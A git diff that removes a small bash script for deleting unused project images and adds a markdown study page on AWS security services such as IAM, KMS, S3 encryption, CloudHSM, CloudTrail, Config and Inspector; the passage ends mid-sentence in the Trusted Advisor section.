934b28b741a..00000000000 --- a/clean_unused_images.sh +++ /dev/null @@ -1,41 +0,0 @@ -#!/bin/bash - -# Define the image folder and the root of your project -IMAGE_FOLDER="./src/images" -PROJECT_ROOT="." - -# Move to the project root -cd "$PROJECT_ROOT" || exit - -# Loop through each image file in the folder -find "$IMAGE_FOLDER" -type f | while IFS= read -r image; do - # Extract the filename without the path - image_name=$(basename "$image") - - # If image file name contains "sponsor", skip it - if [[ "$image_name" == *"sponsor"* ]]; then - echo "Skipping sponsor image: $image_name" - continue - fi - - echo "Checking image: $image_name" - - # Search for the image name using rg and capture the result - search_result=$(rg -F --files-with-matches "$image_name" \ - --no-ignore --hidden \ - --glob '!.git/*' \ - --glob '!$IMAGE_FOLDER/*' < /dev/null) - - echo "Search result: $search_result" - - # If rg doesn't find any matches, delete the image - if [ -z "$search_result" ]; then - echo "Deleting unused image: $image" - rm "$image" - else - echo "Image used: $image_name" - echo "$search_result" - fi -done - -echo "Cleanup completed!" diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md new file mode 100644 index 00000000000..e58b1ff2135 --- /dev/null +++ b/cloud-security/aws-security.md @@ -0,0 +1,986 @@ +# AWS Security + +## Types of services + +### Container services + +Services that fall under container services have the following characteristics: + +* The service itself runs on **separate infrastructure instances**, such as EC2. +* **AWS** is responsible for **managing the operating system and the platform**. +* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**. +* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**. +* Also, platform-level identity and access management where it exists. +* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. + +### Abstract Services + +* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. +* The services are accessed via endpoints using AWS application programming interfaces, APIs. +* The **underlying infrastructure, operating system, and platform is managed by AWS**. +* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared. +* **Data is isolated via security mechanisms**. +* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. + +## IAM - Identity and Access Management + +IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. + +* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. +* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. +* **Access Control** - The method and process of how access is granted to a secure resource + +IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. + +### Users + +This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**. + +#### CLI + +* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT +* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU \(It's not possible to retrieve lost secret access key IDs\). + +Whenever you need to **change the Access Key** this is the process you should follow: +****_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ + +**MFA** is **supported** when using the AWS **CLI**. + +### Groups + +These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**. + +### Roles + +Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources \(like EC2 machines\) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized. + +An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. + +#### AWS Security Token Service \(STS\) + +This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management \(IAM\) users or for users that you authenticate \(federated users\). + +### Policies + +#### Policy Permissions + +Are used to assign permissions. There are 2 types: + +* AWS managed policies \(preconfigured by AWS\) +* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies \(modifying one of them and creating your own\), using the policy generator \(a GUI view that helps you granting and denying permissions\) or writing your own.. + +By **default access** is **denied**, access will be granted if an explicit role has been specified. +If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials \(which are allowed by default\). + +```javascript +{ + "Version": "2012-10-17", //Version of the policy + "Statement": [ //Main element, there can be more than 1 entry in this array + { + "Sid": "Stmt32894y234276923" //Unique identifier (optional) + "Effect": "Allow", //Allow or deny + "Action": [ //Actions that will be allowed or denied + "ec2:AttachVolume", + "ec2:DetachVolume" + ], + "Resource": [ //Resource the action and effect will be applied to + "arn:aws:ec2:*:*:volume/*", + "arn:aws:ec2:*:*:instance/*" + ], + "Condition": { //Optional element that allow to control when the permission will be effective + "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} + } + } + ] +} +``` + +#### Inline Policies + +This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them. +Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. + +#### S3 Bucket Policies + +Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.** + +### Multi-Factor Authentication + +It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication. +You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. + +### Identity Federation + +Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. +An example of an identity provider can be your own corporate Microsoft Active Directory\(via SAML\) or OpenID services \(like Google\). Federated access will then allow the users within it to access AWS. +AWS Identity Federation connects via IAM roles. + +#### Cross Account Trusts and Roles + +**A user** \(trusting\) can create a Cross Account Role with some policies and then, **allow another user** \(trusted\) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account. +It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. + +#### AWS Simple AD + +Not supported: + +* Trust Relations +* AD Admin Center +* Full PS API support +* AD Recycle Bin +* Group Managed Service Accounts +* Schema Extensions +* No Direct access to OS or Instances + +#### Web Federation or OpenID Authentication + +The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS. + +### Other IAM options + +* You can **set a password policy setting** options like minimum length and password requirements. +* You can **download "Credential Report"** with information about current credentials \(like user creation time, is password enabled...\). You can generate a credential report as often as once every **four hours**. + +## KMS - Key Management Service + + AWS Key Management Service \(AWS KMS\) is a managed service that makes it easy for you to **create and control** _**customer master keys**_ **\(CMKs\)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** \(HSMs\) + +KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** \(for example, inside a S3\). If you need to **encrypt information in transit** you need to use something like **TLS**. +KMS is a **region specific service**. + +**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. + +**Customer Master Keys** \(CMK\): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs \(Data Encryption Keys\). Then the DEKs are used to encrypt the data. + +A customer master key \(CMK\) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. + +There are 2 types of master keys: + +* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. +* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. + +**Envelope Encryption** in the context of Key Management Service \(KMS\): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. + +### Key Policies + +These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support. + +Properties of a policy: + +* JSON based document +* Resource --> Affected resources \(can be "\*"\) +* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... \(permissions\) +* Effect --> Allow/Deny +* Principal --> arn affected +* Conditions \(optional\) --> Condition to give the permissions + +Grants: + +* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration \(Decrypt, Encrypt, GenerateDataKey...\) +* After the grant is created a GrantToken and a GratID are issued + +Access: + +* Via key policy -- If this exist, this takes precedent over the IAM policy, s the IAM olicy is not used +* Via IAM policy +* Via grants + +### Key Administrators + +Key administrator by default: + +* Have access to manage KMS but not to encrypt or decrypt data +* Only IAM users and roles can be added to Key Administrators list \(not groups\) +* If external CMK is used, Key Administrators have the permission to import key material + +### Rotation of CMKs + +* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. +* **KMS rotate customer keys every 365 days** \(or you can perform the process manually whenever you want\) and **keys managed by AWS every 3 years** and this time it cannot be changed. +* **Older keys are retained** to decrypt data that was encrypted prior to the rotation +* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. +* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. + +#### Manual rotation + +* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. +* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. +* You need to **keep old keys to decrypt old files** encrypted with it. + +You can import keys from your on-premises key infrastructure . + +### Other information + +KMS is priced per number of encryption/decryption requests received from all services per month. + +KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. + +With KMS policy you can do the following: + +* Limit who can create data keys and which services have access to use these keys +* Limit systems access to encrypt only, decrypt only or both +* Define to enable systems to access keys across regions \(although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions\). + +You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. + +## S3 + +Amazon S3 is a service that allows you **store important amounts of data**. + +Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** \(Policy\), **Encryption** \(Client and Server Side\), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case. + +With resource-based permissions, you can define permissions for sub-directories of your bucket separately. + +### S3 Access logs + +It's possible to **enable S3 access login** \(which by default is disabled\) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket \(the one is saving the logs needs to be in the same region. + +### S3 Encryption Mechanisms + +**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. + +**Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. + +* Encryption: + * Object Data + created plaintext DEK --> Encrypted data \(stored inside S3\) + * Created plaintext DEK + S3 Master Key --> Encrypted DEK \(stored inside S3\) and plain text is deleted from memory +* Decryption: + * Encrypted DEK + S3 Master Key --> Plaintext DEK + * Plaintext DEK + Encrypted data --> Object Data + +Please, note that in this case **the key is managed by AWS** \(rotation only every 3 years\). If you use your own key you willbe able to rotate, disable and apply access control. + +**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. + +* Encryption: + * S3 request data keys from KMS CMK + * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ + * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key +* Decryption: + * S3 ask to KMS to decrypt the encrypted data key of the object + * KMS decrypt the data key with the CMK and send it back to S3 + * S3 decrypts the object data + +**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. + +* Encryption: + * The user sends the object data + Customer key to S3 + * The customer key is used to encrypt the data and the encrypted data is stored + * a salted HMAC value of the customer key is stored also for future key validation + * the customer key is deleted from memory +* Decryption: + * The user send the customer key + * The key is validated against the HMAC value stored + * The customer provided key is then used to decrypt the data + +**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. + +* Encryption: + * Client request for a data key to KMS + * KMS returns the plaintext DEK and the encrypted DEK with the CMK + * Both keys are sent back + * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK \(which is saved as metadata of the encrypted data inside S3\) +* Decryption: + * The encrypted data with the encrypted DEK is sent to the client + * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK + * The client can now decrypt the encrypted data + +**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. + +* Encryption: + * The client generates a DEK and encrypts the plaintext data + * Then, using it's own custom CMK it encrypts the DEK + * submit the encrypted data + encrypted DEK to S3 where it's stored +* Decryption: + * S3 sends the encrypted data and DEK + * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data + +## HSM - Hardware Security Module + +Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage \(note that CloudHSM is a hardware appliance, it is not a virtualized service\). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used. + +The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads + +Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity. + +Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. + +In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution. +Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. + +Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. + +If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. + +**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only \(cannot act as a certificate authority\)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. + +**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements. +Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. + +**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you. + +### CloudHSM Suggestions + +1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS. +2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data. +3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear. +4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed. +5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool. +6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance. +7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source. + +The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month. + +The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**. + +The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH. + +## Amazon Athena + +Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service \(Amazon **S3**\) **using** standard **SQL**. + +You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from th logs, so you can query it. + +Amazon Athena supports the **hability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. + +**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. + +SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. + +## AWS CloudTrail + +This service **tracks and monitors AWS API calls made within the environment**. Each call to an API \(event\) is logged. Each logged event contains: + +* The name of the called API: `eventName` +* The called service: `eventSource` +* The time: `eventTime` +* The IP address: `SourceIPAddress` +* The agent method: `userAgent`. Examples: + * Signing.amazonaws.com - From AWS Management Console + * console.amazonaws.com - Root user of the account + * lambda.amazonaws.com - AWS Lambda +* The request parameters: `requestParameters` +* The response elements: `responseElements` + +Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**. +CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour. +When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. + +Logs are saved in an S3 bucket. By default Server Side Encryption is used \(SSE-S3\) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. + +### Log File Naing Convention + +![](../.gitbook/assets/image%20%28253%29.png) + +### S3 folder structure + +![](../.gitbook/assets/image%20%28430%29.png) + +Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names, + +**Digest** files have a similar folders path: + +![](../.gitbook/assets/image%20%28438%29.png) + +### Aggregate Logs from Multiple Accounts + +* Create a Trial in the AWS account where you want the log files to be delivered to +* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access +* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 + +However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account + +### Log Files Checking + +You can check that the logs haven't been altered by running + +```javascript +aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] +``` + +### Logs to CloudWatch + +**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.** +Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: + +* CreateLogStream: This allows to create a CloudWatch Logs log streams +* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream + +### Event History + +CloudTrail Event History allows you to inspect in a table the logs that have been recorded: + +![](../.gitbook/assets/image%20%28431%29.png) + +### Insights + +**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. + +## CloudWatch + +Amazon CloudWatch allows to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs. +CloudWatch Log Event have a **size limitation of 256KB of each log line**. + +You can monitor for example logs from CloudTrail. +Events that are monitored: + +* Changes to Security Groups and NACLs +* Starting, Stopping, rebooting and terminating EC2instances +* Changes to Security Policies within IAM and S3 +* Failed login attempts to the AWS Management Console +* API calls that resulted in failed authorization +* Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html) + +### Agent Installation + +You can install agents insie your machines/containers to automatically send the logs back to CloudWatch. + +* **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM \(CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM\) +* **Download** and **install** the **agent** onto the EC2 instance \([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)\). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage +* **Configure** and **start** the CloudWatch Agent + +A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order. + +## Cost Explorer and Anomaly detection + +This allows you to check how are you expending money in AWS services and help you **detecting anomalies**. +Moreover, you can configure an anomaly detection so AWS will warn you when some anomaly in costs is found. + +### Budgets + +Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**. +Also, they can be used for non cost related monitoring like the usage of a service \(how many GB are used in a particular S3 bucket?\). + +## AWS Config + +AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. +This service is **region specific**. + +A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too. + +* **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource. +* **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance +* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. +* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. +* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. + +**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type. + +**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. + +**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. + +**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. + +### Config Rules + +Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**. +AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. + +* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. +* **Custom rules**: You can create your own rules to check specific customconfigurations. + +Limit of 50 config rules per region before you need to contact AWS for an increase. +Non compliant results are NOT deleted. + +## SNS Topic + +SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms. +You can have various endpoints associated to the SNS stream. +You can use SNS topic to send notifications to you via email or to SQS to treate programatically the notification. + +## Inspector + +The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security. + +These are the tests that AWS Inspector allow you to perform: + +* **CVEs** +* **CIS Benchmarks** +* **Security Best practices** +* **Network Reachability** + +You can make any of those run on the EC2 machines you decide. + +### Element of AWS Inspector + +**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances \(DescribeInstances\) +**Assessment Targets**: Group of EC2 instances that you want to run an assessment against +**AWS agents**: Software agents that must be install on EC2 instances to monitor. Data is sent to Amazon Inspector using a TLS channel. A regular heartbeat is sent from the agent to the inspector asking for instructions. It can autoupdate itself +**Assessment Templates**: Define specific configurations as to how an assessment is run on your EC2 instances. An assessment template cannot be modified after creation. + +* Rules packages to be used +* Duration of the assessment run 15min/1hour/8hours +* SNS topics, select when notify: Starts, finished, change state, reports a finding +* Attributes to b assigned to findings + +**Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity \(high, medium, low, informational\). The possibilities are: + +* Common Vulnerabilities and Exposures \(CVEs\) +* Center for Internet Security \(CIS\) Benchmark +* Security Best practices + +Once you have configured the Amazon Inspector Role, the AWS Agents are Installed, the target is configured and the template is configured, you will be able to run it. An assessment run can be stopped, resumed, or deleted. + +Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template. + +{% hint style="info" %} +Note that nowadays AWS already allow you to **autocreate** all the necesary **configurations** and even automatically **install the agents inside the EC2 instances.** +{% endhint %} + +### **Reporting** + +**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. + +**Assessment Report**: Provide details on what was assessed and the results of the assessment. + +* The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred. +* The **full report** is the finding report + a list of rules that were passed. + +## Trusted Advisor + +The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a is a cross-region service. + +1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money. +2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services. +3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities. +4. **Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources. + +The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports 